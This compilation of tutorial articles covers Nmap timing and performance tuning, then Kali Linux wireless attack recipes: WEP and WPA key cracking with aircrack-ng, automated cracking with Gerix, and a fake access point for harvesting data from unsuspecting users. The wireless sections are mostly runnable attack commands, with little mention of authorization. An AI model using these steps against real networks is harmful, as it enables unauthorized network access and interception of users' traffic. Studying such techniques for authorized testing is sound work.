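Turning the Nping summary into concrete flag values is simple arithmetic: roughly double the maximum RTT for --initial-rtt-timeout, and up to four times it for --max-rtt-timeout, per the recommendation above. Here is a small sketch that parses the "Max rtt" line and prints suggested flags; the parsing helper is our own illustration, not part of Nmap or Nping:

```python
import re

def rtt_flags(nping_output: str) -> str:
    """Parse Nping's RTT summary and suggest Nmap timeout flags.

    Rule of thumb: --initial-rtt-timeout ~ 2x max RTT,
    --max-rtt-timeout up to 4x max RTT.
    """
    m = re.search(r"Max rtt: ([\d.]+)ms", nping_output)
    if not m:
        raise ValueError("no 'Max rtt' line found")
    max_rtt = float(m.group(1))
    init_ms = round(2 * max_rtt)   # double the maximum RTT
    max_ms = round(4 * max_rtt)    # up to four times the maximum RTT
    return f"--initial-rtt-timeout {init_ms}ms --max-rtt-timeout {max_ms}ms"

# Using the summary line from the sample run above:
sample = "Max rtt: 10.170ms | Min rtt: 0.316ms | Avg rtt: 0.851ms"
print(rtt_flags(sample))  # → --initial-rtt-timeout 20ms --max-rtt-timeout 41ms
```

You could pipe a real `nping -c30 <target>` run into this helper and paste the resulting flags straight into your nmap command line.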
Adjusting performance parameters

Nmap not only adjusts itself to different network and target conditions while scanning, but it also supports several parameters that affect its behavior, such as the number of hosts scanned concurrently, the number of retries, and the number of allowed probes. Learning how to adjust these parameters properly can cut a lot off your scanning time. The following explains the Nmap parameters that can be adjusted to improve performance.

How to do it...

Enter the following command, adjusting the values for your target condition:

$ nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target>

How it works...

The command shown previously tells Nmap to scan and report by grouping no fewer than 100 (--min-hostgroup 100) and no more than 500 hosts (--max-hostgroup 500). It also tells Nmap to retry only twice before giving up on any port (--max-retries 2):

# nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target>

It is important to note that setting these values incorrectly will most likely hurt performance or accuracy rather than improve them.

Nmap sends many probes during its port scanning phase because of the ambiguity of a lack of response: either the packet got lost, the service is filtered, or the service is not open. By default, Nmap adjusts the number of retries based on network conditions, but you can set this value with the argument --max-retries. Increasing the number of retries can improve Nmap's accuracy, but keep in mind that this sacrifices speed:

$ nmap --max-retries 10 <target>

The arguments --min-hostgroup and --max-hostgroup control the number of hosts that we probe concurrently. Keep in mind that reports are also generated based on this value, so adjust it depending on how often you would like to see the scan results.
Larger groups are optimal to improve performance, but you may prefer smaller host groups on slow networks:

# nmap -A -p- --min-hostgroup 100 --max-hostgroup 500 <target>

There is also a very important argument that can be used to limit the number of packets sent per second by Nmap. The arguments --min-rate and --max-rate need to be used carefully to avoid undesirable effects. These rates are set automatically by Nmap if the arguments are not present:

# nmap -A -p- --min-rate 50 --max-rate 100 <target>

Finally, the arguments --min-parallelism and --max-parallelism can be used to control the number of probes for a host group. By setting these arguments, Nmap will no longer adjust the values dynamically:

# nmap -A --max-parallelism 1 <target>
# nmap -A --min-parallelism 10 --max-parallelism 250 <target>

There's more...

If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout, as shown in the following command:

# nmap -sV -A -p- --host-timeout 5m <target>

Interactive mode in Nmap allows users to press keys to dynamically change runtime variables, such as verbosity, debugging, and packet tracing. Although the idea of including timing and performance options in the interactive mode has come up a few times on the development mailing list, it hasn't been implemented so far. However, there is an unofficial patch, submitted in June 2012, that allows you to change the minimum and maximum packet rate values (--max-rate and --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883.

To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix - Scanning Phases for more information.

Summary

In this article, we learned how to implement and optimize scans. Nmap scans among several clients, allowing us to save time and take advantage of extra bandwidth and CPU resources.
This article is short but full of tips for optimizing your scans. Prepare to dig deep into Nmap's internals and the timing and performance parameters!
Wireless Attacks in Kali Linux

Packt
11 Oct 2013
In this article, by Willie L. Pritchett, author of the Kali Linux Cookbook, we will learn about the various wireless attacks. These days, wireless networks are everywhere. With users being on the go like never before, having to remain stationary because of having to plug into an Ethernet cable to gain Internet access is not feasible. There is a price to be paid for this convenience: wireless connections are not as secure as Ethernet connections. In this article, we will explore various methods for manipulating radio network traffic, including mobile phones and wireless networks. We will cover the following topics:

 - Wireless network WEP cracking
 - Wireless network WPA/WPA2 cracking
 - Automating wireless network cracking
 - Accessing clients using a fake AP
 - URL traffic manipulation
 - Port redirection
 - Sniffing network traffic

Wireless network WEP cracking

Wired Equivalent Privacy, or WEP as it's commonly referred to, has been around since 1999 and is an older standard that was used to secure wireless networks. In 2003, WEP was replaced by WPA and later by WPA2. Because more secure protocols are available, WEP encryption is rarely used. As a matter of fact, it is highly recommended that you never use WEP encryption to secure your network! There are many known ways to exploit WEP encryption, and we will explore one of them in this recipe.

In this recipe, we will use the AirCrack suite to crack a WEP key. The AirCrack suite (or AirCrack-NG as it's commonly referred to) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WEP key.

Getting ready

In order to perform the tasks of this recipe, experience with the Kali terminal window is required. A supported wireless card configured for packet injection will also be required.
In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties. Please ensure your wireless card allows packet injection, as this is not something that all wireless cards support.

How to do it...

Let's begin the process of using AirCrack to crack a network session secured by WEP.

Open a terminal window and bring up a list of wireless network interfaces:

airmon-ng

Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.

Next, we need to stop the wlan0 interface and take it down so that we can change our MAC address in the next step:

airmon-ng stop wlan0
ifconfig wlan0 down

Next, we need to change the MAC address of our interface. Since the MAC address of your machine identifies you on any network, changing the identity of our machine allows us to keep our true MAC address hidden. In this case, we will use 00:11:22:33:44:55:

macchanger --mac 00:11:22:33:44:55 wlan0

Now we need to restart airmon-ng:

airmon-ng start wlan0

Next, we will use airodump to locate the available wireless networks nearby:

airodump-ng wlan0

A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click your mouse, and select copy. Also, make note of the channel the network is transmitting its signal on. You will find this information in the Channel column. In this case, the channel is 10.

Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options:

 - -c allows us to select our channel. In this case, we use 10.
 - -w allows us to select the name of our file. In this case, we have chosen wirelessattack.
 - --bssid allows us to select our BSSID.
In this case, we will paste 09:AC:90:AB:78 from the clipboard:

airodump-ng -c 10 -w wirelessattack --bssid 09:AC:90:AB:78 wlan0

A new terminal window will open displaying the output from the previous command. Leave this window open.

Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng -1 0 -a [BSSID] -h [our chosen MAC address] -e [ESSID] [Interface]:

aireplay-ng -1 0 -a 09:AC:90:AB:78 -h 00:11:22:33:44:55 -e backtrack wlan0

Next, we send some traffic to the router so that we have some data to capture. We use aireplay again in the following format: aireplay-ng -3 -b [BSSID] -h [our chosen MAC address] [Interface]:

aireplay-ng -3 -b 09:AC:90:AB:78 -h 00:11:22:33:44:55 wlan0

Your screen will begin to fill with traffic. Let this process run for a minute or two until we have enough information to run the crack.

Finally, we run AirCrack to crack the WEP key:

aircrack-ng -b 09:AC:90:AB:78 wirelessattack.cap

That's it!

How it works...

In this recipe, we used the AirCrack suite to crack the WEP key of a wireless network. AirCrack is one of the most popular programs for cracking WEP. It works by gathering packets from a wireless connection over WEP and then mathematically analyzing the data to crack the WEP-encrypted key. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address, which allowed us to change our identity on the network, and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute-forcing the generated CAP file in order to get the wireless password.
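The command sequence in this recipe lends itself to a small wrapper script. The following is a dry-run sketch only: it echoes the recipe's commands, parameterized with the placeholder BSSID, spoofed MAC, channel, and capture name used above, rather than executing anything. Substitute your own authorized target's values and remove the echo statements before using it for real:

```shell
# Dry-run sketch of the WEP recipe's attack sequence.
# All values below are the placeholders used in this recipe.
bssid='09:AC:90:AB:78'
fake_mac='00:11:22:33:44:55'
channel=10
capture='wirelessattack'
iface='wlan0'

# Capture traffic for the target BSSID on its channel.
echo "airodump-ng -c ${channel} -w ${capture} --bssid ${bssid} ${iface}"
# Fake-authenticate with the access point.
echo "aireplay-ng -1 0 -a ${bssid} -h ${fake_mac} -e backtrack ${iface}"
# Replay ARP requests to generate crackable traffic.
echo "aireplay-ng -3 -b ${bssid} -h ${fake_mac} ${iface}"
# Crack the WEP key from the capture file.
echo "aircrack-ng -b ${bssid} ${capture}.cap"
```

Keeping the target details in variables at the top makes it easy to rerun the whole sequence against a different lab network.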
Wireless network WPA/WPA2 cracking

Wi-Fi Protected Access, or WPA as it's commonly referred to, has been around since 2003 and was created to secure wireless networks and replace the outdated previous standard, WEP encryption. In 2003, WEP was replaced by WPA and later by WPA2. Because more secure protocols are available, WEP encryption is rarely used.

In this recipe, we will use the AirCrack suite to crack a WPA key. The AirCrack suite (or AirCrack-NG as it's commonly referred to) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WPA key.

Getting ready

In order to perform the tasks of this recipe, experience with the Kali Linux terminal window is required. A supported wireless card configured for packet injection will also be required. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties.

How to do it...

Let's begin the process of using AirCrack to crack a network session secured by WPA.

Open a terminal window and bring up a list of wireless network interfaces:

airmon-ng

Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.

Next, we need to stop the wlan0 interface and take it down:

airmon-ng stop wlan0
ifconfig wlan0 down

Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55:

macchanger --mac 00:11:22:33:44:55 wlan0

Now we need to restart airmon-ng:

airmon-ng start wlan0

Next, we will use airodump to locate the available wireless networks nearby:

airodump-ng wlan0

A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy.
Also, make note of the channel the network is transmitting its signal on. You will find this information in the Channel column. In this case, the channel is 10.

Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options:

 - -c allows us to select our channel. In this case, we use 10.
 - -w allows us to select the name of our file. In this case, we have chosen wirelessattack.
 - --bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard.

airodump-ng -c 10 -w wirelessattack --bssid 09:AC:90:AB:78 wlan0

A new terminal window will open displaying the output from the previous command. Leave this window open.

Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng --deauth 1 -a [BSSID] -c [our chosen MAC address] [Interface]. This process may take a few moments:

aireplay-ng --deauth 1 -a 09:AC:90:AB:78 -c 00:11:22:33:44:55 wlan0

Finally, we run AirCrack to crack the WPA key. The -w option allows us to specify the location of our wordlist. We will use the .cap file that we named earlier. In this case, the file's name is wirelessattack.cap:

aircrack-ng -w ./wordlist.lst wirelessattack.cap

That's it!

How it works...

In this recipe, we used the AirCrack suite to crack the WPA key of a wireless network. AirCrack is one of the most popular programs for cracking WPA. It works by gathering packets from a wireless connection over WPA and then brute-forcing passwords against the gathered data until a successful handshake is established. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address, which allowed us to change our identity on the network, and then searched for available wireless networks to attack using airodump.
Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute-forcing the generated CAP file in order to get the wireless password.

Automating wireless network cracking

In this recipe, we will use Gerix to automate a wireless network attack. Gerix is an automated GUI for AirCrack. Gerix comes installed by default on Kali Linux and will speed up your wireless network cracking efforts.

Getting ready

A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties.

How to do it...

Let's begin the process of performing an automated wireless network crack with Gerix by downloading it.

Using wget, download Gerix from the following website:

wget https://bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/downloads/gerix-wifi-cracker-master.rar

Once the file has been downloaded, we need to extract the data from the RAR file:

unrar x gerix-wifi-cracker-master.rar

Now, to keep things consistent, let's move the Gerix folder to the /usr/share directory with the other penetration testing tools:

mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker

Let's navigate to the directory where Gerix is located:

cd /usr/share/gerix-wifi-cracker

To begin using Gerix, we issue the following command:

python gerix.py

Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. Once Monitor mode has been enabled successfully, under Select Target Network, click on the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP-encrypted network. Click on the WEP tab.
Under Functionalities, click on the Start Sniffing and Logging button. Click on the subtab WEP Attacks (No Client). Click on the Start false access point authentication on victim button. Click on the Start the ChopChop attack button. In the terminal window that opens, answer Y to the Use this packet question. Once completed, copy the .cap file generated. Click on the Create the ARP packet to be injected on the victim access point button. Click on the Inject the created packet on victim access point button. In the terminal window that opens, answer Y to the Use this packet question. Once you have gathered approximately 20,000 packets, click on the Cracking tab. Click on the Aircrack-ng - Decrypt WEP Password button. That's it!

How it works...

In this recipe, we used Gerix to automate a crack on a wireless network in order to obtain the WEP key. We began the recipe by launching Gerix and enabling the monitor mode interface. Next, we selected our victim from a list of attack targets provided by Gerix. After we started sniffing the network traffic, we used the ChopChop attack to generate the CAP file. We concluded the recipe by gathering 20,000 packets and brute-forcing the CAP file with AirCrack. With Gerix, we were able to automate the steps to crack a WEP key without having to manually type commands in a terminal window. This is an excellent way to quickly and efficiently break into a WEP-secured network.

Accessing clients using a fake AP

In this recipe, we will use Gerix to create and set up a fake access point (AP). Setting up a fake access point gives us the ability to gather information on each of the computers that access it. People in this day and age will often sacrifice security for convenience. Connecting to an open wireless access point to send a quick e-mail or to quickly log into a social network is rather convenient. Gerix is an automated GUI for AirCrack.
Getting ready

A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties.

How to do it...

Let's begin the process of creating a fake AP with Gerix.

Navigate to the directory where Gerix is located:

cd /usr/share/gerix-wifi-cracker

To begin using Gerix, we issue the following command:

python gerix.py

Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. Once Monitor mode has been enabled successfully, under Select Target Network, press the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP-encrypted network. Click on the Fake AP tab. Change the Access Point ESSID from honeypot to something less suspicious. In this case, we are going to use personalnetwork. We will use the defaults for each of the other options. To start the fake access point, click on the Start Fake Access Point button. That's it!

How it works...

In this recipe, we used Gerix to create a fake AP. Creating a fake AP is an excellent way of collecting information from unsuspecting users. The reason fake access points are a great tool is that, to your victim, they appear to be a legitimate access point, thus making them trusted by the user. Using Gerix, we were able to automate the setup of a fake access point in a few short clicks.
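Under the hood, Gerix drives the aircrack-ng suite, and a roughly equivalent manual fake AP can be brought up with airbase-ng from the same suite. The sketch below only echoes the commands as a dry run; the ESSID mirrors the recipe, while mon0 as the monitor interface and the exact airbase-ng flags are assumptions to verify against your installed aircrack-ng version:

```shell
# Dry-run sketch of a manual fake AP, approximating what Gerix automates.
# essid mirrors the recipe; mon0 is an assumed monitor-mode interface name.
essid='personalnetwork'
channel=10
monitor_iface='mon0'

echo "airmon-ng start wlan0"                                 # enable monitor mode
echo "airbase-ng -e ${essid} -c ${channel} ${monitor_iface}" # broadcast the fake AP
```

Clients that associate with the broadcast ESSID can then be observed on the tap interface that airbase-ng creates, which is the information-gathering step Gerix wraps in its GUI.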